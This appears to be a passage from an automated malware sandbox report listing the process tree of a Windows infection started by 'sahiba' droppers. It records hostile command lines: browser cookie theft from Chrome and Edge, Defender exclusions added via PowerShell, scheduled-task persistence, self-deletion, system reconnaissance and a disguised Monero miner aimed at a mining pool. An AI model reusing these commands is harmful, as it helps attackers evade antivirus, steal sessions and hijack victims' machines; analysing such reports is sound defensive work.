C:\Users\Admin\AppData\Local\Temp\3a2l23xx.t2r\toolspab1.exe
9⤵
PID:9424

C:\Users\Admin\AppData\Local\Temp\3a2l23xx.t2r\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\3a2l23xx.t2r\toolspab1.exe
10⤵
PID:7148

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jzp1p40b.tkx\installer.exe /qn CAMPAIGN=654 & exit
8⤵
PID:5500

C:\Users\Admin\AppData\Local\Temp\jzp1p40b.tkx\installer.exe
C:\Users\Admin\AppData\Local\Temp\jzp1p40b.tkx\installer.exe /qn CAMPAIGN=654
9⤵
PID:9892

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tdw3wvpx.vni\app.exe /8-2222 & exit
8⤵
PID:9632

C:\Users\Admin\AppData\Local\Temp\tdw3wvpx.vni\app.exe
C:\Users\Admin\AppData\Local\Temp\tdw3wvpx.vni\app.exe /8-2222
9⤵
PID:10172

C:\Users\Admin\AppData\Local\Temp\10-eb518-01b-bf687-afb30e5934858\Vehujaexoshu.exe
"C:\Users\Admin\AppData\Local\Temp\10-eb518-01b-bf687-afb30e5934858\Vehujaexoshu.exe"
7⤵
PID:6568

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sahiba_6.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1772

C:\Users\Admin\AppData\Local\Temp\7zS4AF2FD14\sahiba_6.exe
sahiba_6.exe
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2248

C:\Users\Admin\AppData\Roaming\2660024.exe
"C:\Users\Admin\AppData\Roaming\2660024.exe"
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4824

C:\Users\Admin\AppData\Roaming\1962382.exe
"C:\Users\Admin\AppData\Roaming\1962382.exe"
5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4860

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
6⤵
- Executes dropped EXE
PID:4228

C:\Users\Admin\AppData\Roaming\1211909.exe
"C:\Users\Admin\AppData\Roaming\1211909.exe"
5⤵
- Executes dropped EXE
PID:5112

C:\Users\Admin\AppData\Roaming\7231721.exe
"C:\Users\Admin\AppData\Roaming\7231721.exe"
5⤵
- Executes dropped EXE
PID:5012

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sahiba_7.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:3924

C:\Users\Admin\AppData\Local\Temp\7zS4AF2FD14\sahiba_7.exe
sahiba_7.exe
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
PID:3396

C:\Users\Admin\Documents\Ai0RsL1BEVbKkf3Iimt7atCa.exe
"C:\Users\Admin\Documents\Ai0RsL1BEVbKkf3Iimt7atCa.exe"
5⤵
PID:2156

C:\Users\Admin\Documents\Ai0RsL1BEVbKkf3Iimt7atCa.exe
C:\Users\Admin\Documents\Ai0RsL1BEVbKkf3Iimt7atCa.exe
6⤵
PID:5864

C:\Users\Admin\Documents\ykQwWrNLN3AM2gXp5FQw1o39.exe
"C:\Users\Admin\Documents\ykQwWrNLN3AM2gXp5FQw1o39.exe"
5⤵
PID:4196

C:\Users\Admin\Documents\H1iJnfdukbiI7SRIbA1A8fL0.exe
"C:\Users\Admin\Documents\H1iJnfdukbiI7SRIbA1A8fL0.exe"
5⤵
PID:3188

C:\Users\Admin\Documents\Hriq5Y8LAuBWsOGoBPRAp2fj.exe
"C:\Users\Admin\Documents\Hriq5Y8LAuBWsOGoBPRAp2fj.exe"
5⤵
PID:1892

C:\Users\Admin\Documents\ucjM_nQL9KKMFwcgO5tqPZJ9.exe
"C:\Users\Admin\Documents\ucjM_nQL9KKMFwcgO5tqPZJ9.exe"
5⤵
PID:3940

C:\Users\Admin\Documents\ucjM_nQL9KKMFwcgO5tqPZJ9.exe
"C:\Users\Admin\Documents\ucjM_nQL9KKMFwcgO5tqPZJ9.exe"
6⤵
PID:1432

C:\Users\Admin\Documents\C2uo5aXSSwwwf3fDEohlK6dU.exe
"C:\Users\Admin\Documents\C2uo5aXSSwwwf3fDEohlK6dU.exe"
5⤵
PID:3568

C:\Users\Admin\Documents\MY69a8kW1C2ZTz6ercH_t1a7.exe
"C:\Users\Admin\Documents\MY69a8kW1C2ZTz6ercH_t1a7.exe"
5⤵
PID:5256

C:\Users\Admin\Documents\gRHpHphvPRBVdqnMta0qecXE.exe
"C:\Users\Admin\Documents\gRHpHphvPRBVdqnMta0qecXE.exe"
5⤵
PID:5492

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
6⤵
PID:6548

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
6⤵
PID:6548

C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
6⤵
PID:2512

C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
6⤵
PID:3864

C:\Users\Admin\Documents\uCNrWs73galBi403xdHm_dKS.exe
"C:\Users\Admin\Documents\uCNrWs73galBi403xdHm_dKS.exe"
5⤵
PID:5936

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im uCNrWs73galBi403xdHm_dKS.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\uCNrWs73galBi403xdHm_dKS.exe" & del C:\ProgramData\*.dll & exit
6⤵
PID:6856

C:\Windows\SysWOW64\taskkill.exe
taskkill /im uCNrWs73galBi403xdHm_dKS.exe /f
7⤵
- Kills process with taskkill
PID:3680

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
7⤵
- Delays execution with timeout.exe
PID:8940

C:\Users\Admin\Documents\wtc3wJA28F7OUYKHKdQdBlzm.exe
"C:\Users\Admin\Documents\wtc3wJA28F7OUYKHKdQdBlzm.exe"
5⤵
PID:5924

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ipconfig /all
6⤵
PID:6956

C:\Windows\SysWOW64\ipconfig.exe
ipconfig /all
7⤵
- Gathers network information
PID:7100

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c wmic cpu get deviceid, name, numberofcores, maxclockspeed
6⤵
PID:5800

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic cpu get deviceid, name, numberofcores, maxclockspeed
7⤵
PID:6688

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c wmic memorychip get BankLabel, DeviceLocator, MemoryType, TypeDetail, Capacity, Speed
6⤵
PID:9912

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic memorychip get BankLabel, DeviceLocator, MemoryType, TypeDetail, Capacity, Speed
7⤵
PID:10152

C:\Users\Admin\Documents\tphB7cJFEfaTAi10OjfB8mOM.exe
"C:\Users\Admin\Documents\tphB7cJFEfaTAi10OjfB8mOM.exe"
5⤵
PID:6020

C:\Users\Admin\Documents\AcQIoZNXcL_3bqQF9vrMocv6.exe
"C:\Users\Admin\Documents\AcQIoZNXcL_3bqQF9vrMocv6.exe"
5⤵
PID:6012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 660
6⤵
- Program crash
PID:4552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 672
6⤵
- Program crash
PID:5624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 676
6⤵
- Program crash
PID:5324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 808
6⤵
- Program crash
PID:5992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 656
6⤵
- Program crash
PID:6104

C:\Users\Admin\Documents\MsZewNWMFU3_TUurHgwd_nHn.exe
"C:\Users\Admin\Documents\MsZewNWMFU3_TUurHgwd_nHn.exe"
5⤵
PID:6004

C:\Users\Admin\Documents\MsZewNWMFU3_TUurHgwd_nHn.exe
"{path}"
6⤵
PID:4664

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im MsZewNWMFU3_TUurHgwd_nHn.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\MsZewNWMFU3_TUurHgwd_nHn.exe" & del C:\ProgramData\*.dll & exit
7⤵
PID:8096

C:\Windows\SysWOW64\taskkill.exe
taskkill /im MsZewNWMFU3_TUurHgwd_nHn.exe /f
8⤵
- Kills process with taskkill
PID:8400

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
8⤵
- Delays execution with timeout.exe
PID:5144

C:\Users\Admin\Documents\VZbSvvRn5LxNBETtYZS7Rat8.exe
"C:\Users\Admin\Documents\VZbSvvRn5LxNBETtYZS7Rat8.exe"
5⤵
PID:5996

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
6⤵
PID:3088

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
6⤵
PID:7056

C:\Users\Admin\Documents\TAhGKCOd7cmtomDN5pfHQbVs.exe
"C:\Users\Admin\Documents\TAhGKCOd7cmtomDN5pfHQbVs.exe"
5⤵
PID:5988

C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
6⤵
PID:5460

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
7⤵
PID:4772

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
7⤵
PID:6900

C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
6⤵
PID:4844

C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
6⤵
PID:4948

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
7⤵
PID:6896

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
7⤵
PID:6916

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
7⤵
PID:6368

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
7⤵
PID:7016

C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
7⤵
PID:2184

C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
7⤵
PID:7036

C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
7⤵
PID:6492

C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
7⤵
PID:7208

C:\Users\Admin\Documents\psY_syms0SW2xRgig7h0r44a.exe
"C:\Users\Admin\Documents\psY_syms0SW2xRgig7h0r44a.exe"
5⤵
PID:5976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5976 -s 660
6⤵
- Program crash
PID:5668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5976 -s 676
6⤵
- Program crash
PID:3388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5976 -s 720
6⤵
- Program crash
PID:960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5976 -s 816
6⤵
- Program crash
PID:6260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5976 -s 1080
6⤵
- Program crash
PID:6600

C:\Users\Admin\Documents\zcfXbqMM1_Jv19uj70nZpcm7.exe
"C:\Users\Admin\Documents\zcfXbqMM1_Jv19uj70nZpcm7.exe"
5⤵
PID:5964

C:\Users\Admin\Documents\zcfXbqMM1_Jv19uj70nZpcm7.exe
"{path}"
6⤵
PID:7384

C:\Users\Admin\Documents\u7rzk4sf8gRQ9bFpC8tSeeF7.exe
"C:\Users\Admin\Documents\u7rzk4sf8gRQ9bFpC8tSeeF7.exe"
5⤵
PID:4572

C:\Users\Admin\Documents\u7rzk4sf8gRQ9bFpC8tSeeF7.exe
"C:\Users\Admin\Documents\u7rzk4sf8gRQ9bFpC8tSeeF7.exe" -a
6⤵
PID:4140

C:\Users\Admin\Documents\8dfnsfWXxMAA8mWr6Je1jtlC.exe
"C:\Users\Admin\Documents\8dfnsfWXxMAA8mWr6Je1jtlC.exe"
5⤵
PID:1900

C:\Users\Admin\AppData\Local\Temp\is-D8IKE.tmp\8dfnsfWXxMAA8mWr6Je1jtlC.tmp
"C:\Users\Admin\AppData\Local\Temp\is-D8IKE.tmp\8dfnsfWXxMAA8mWr6Je1jtlC.tmp" /SL5="$401E8,138429,56832,C:\Users\Admin\Documents\8dfnsfWXxMAA8mWr6Je1jtlC.exe"
6⤵
PID:4176

C:\Users\Admin\AppData\Local\Temp\is-V8812.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-V8812.tmp\Setup.exe" /Verysilent
7⤵
PID:6160

C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
"C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe"
8⤵
PID:6320

C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
"C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe" -a
9⤵
PID:4504

C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"
8⤵
PID:6264

C:\Program Files (x86)\GameBox INC\GameBox\GameBox8876.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBox8876.exe" /Silent
8⤵
PID:6384

C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"
8⤵
PID:6352

C:\Users\Admin\AppData\Roaming\4039867.exe
"C:\Users\Admin\AppData\Roaming\4039867.exe"
9⤵
PID:6156

C:\Users\Admin\AppData\Roaming\4763924.exe
"C:\Users\Admin\AppData\Roaming\4763924.exe"
9⤵
PID:7100

C:\Users\Admin\AppData\Roaming\8864079.exe
"C:\Users\Admin\AppData\Roaming\8864079.exe"
9⤵
PID:2136

C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"
8⤵
PID:6340

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im GameBox64bit.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe" & del C:\ProgramData\*.dll & exit
9⤵
PID:7092

C:\Windows\SysWOW64\taskkill.exe
taskkill /im GameBox64bit.exe /f
10⤵
- Kills process with taskkill
PID:7604

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
10⤵
- Delays execution with timeout.exe
PID:6356

C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe"
8⤵
PID:6300

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
9⤵
PID:6660

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
9⤵
PID:6844

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
9⤵
PID:8028

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
9⤵
PID:9088

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sahiba_10.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1824

C:\Users\Admin\AppData\Local\Temp\7zS4AF2FD14\sahiba_10.exe
sahiba_10.exe
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4304

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
5⤵
- Executes dropped EXE
PID:4768

C:\Users\Admin\AppData\Local\Temp\askinstall54.exe
"C:\Users\Admin\AppData\Local\Temp\askinstall54.exe"
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4940

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
7⤵
PID:6592

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
8⤵
- Kills process with taskkill
PID:6784

C:\Users\Admin\AppData\Local\Temp\chome2.exe
"C:\Users\Admin\AppData\Local\Temp\chome2.exe"
6⤵
- Executes dropped EXE
PID:5024

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
7⤵
PID:3832

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
8⤵
PID:8752

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\chome2.exe"
7⤵
PID:5716

C:\Users\Admin\AppData\Local\Temp\svchost64.exe
C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\chome2.exe"
8⤵
PID:4784

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
9⤵
PID:2276

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
10⤵
- Creates scheduled task(s)
PID:5852

C:\Windows\system32\services64.exe
"C:\Windows\system32\services64.exe"
9⤵
PID:1680

C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
10⤵
PID:4808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
11⤵
PID:6304

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
11⤵
PID:8664

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
10⤵
PID:7284

C:\Users\Admin\AppData\Local\Temp\svchost64.exe
C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
11⤵
PID:4464

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
12⤵
PID:6988

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
13⤵
- Creates scheduled task(s)
PID:8788

C:\Windows\system32\Microsoft\Libs\sihost64.exe
"C:\Windows\system32\Microsoft\Libs\sihost64.exe"
12⤵
PID:8472

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
12⤵
PID:1060

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
12⤵
PID:4504

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
13⤵
PID:4788

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
9⤵
PID:2136

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
10⤵
PID:6372

C:\Users\Admin\AppData\Local\Temp\GLKbrow.exe
"C:\Users\Admin\AppData\Local\Temp\GLKbrow.exe"
6⤵
- Executes dropped EXE
PID:4068

C:\Users\Admin\AppData\Local\Temp\GLKbrow.exe
C:\Users\Admin\AppData\Local\Temp\GLKbrow.exe
7⤵
PID:4392

C:\Users\Admin\AppData\Local\Temp\GLKbrow.exe
C:\Users\Admin\AppData\Local\Temp\GLKbrow.exe
7⤵
PID:2760

C:\Users\Admin\AppData\Local\Temp\james2.exe
"C:\Users\Admin\AppData\Local\Temp\james2.exe"
6⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4280

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
6⤵
- Executes dropped EXE
PID:4676

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
7⤵
PID:5284

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "setup.exe" /f
8⤵
- Kills process with taskkill
PID:4028

C:\Users\Admin\AppData\Local\Temp\setup11.exe
"C:\Users\Admin\AppData\Local\Temp\setup11.exe"
6⤵
- Executes dropped EXE
PID:5020

C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\setup11.exe" 1627990422 0
7⤵
PID:1772

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
6⤵
- Executes dropped EXE
PID:4512

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
7⤵
- Executes dropped EXE
PID:4712

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
7⤵
PID:5516

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sahiba_9.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:3680

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sahiba_8.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1864

C:\Users\Admin\AppData\Local\Temp\7zS4AF2FD14\sahiba_9.exe
sahiba_9.exe
1⤵
- Executes dropped EXE
PID:2136

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
2⤵
PID:4676

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /DeleteCookiesWildcard "*.facebook.com"
2⤵
PID:4712

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
2⤵
- Executes dropped EXE
PID:1968

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
2⤵
PID:4732

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
2⤵
PID:3568

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
2⤵
- Executes dropped EXE
PID:2096

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
2⤵
PID:800

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
2⤵
PID:5380

C:\Users\Admin\AppData\Local\Temp\7zS4AF2FD14\sahiba_8.exe
sahiba_8.exe
1⤵
- Executes dropped EXE
PID:4248

C:\Users\Admin\AppData\Local\Temp\is-D5J7I.tmp\sahiba_8.tmp
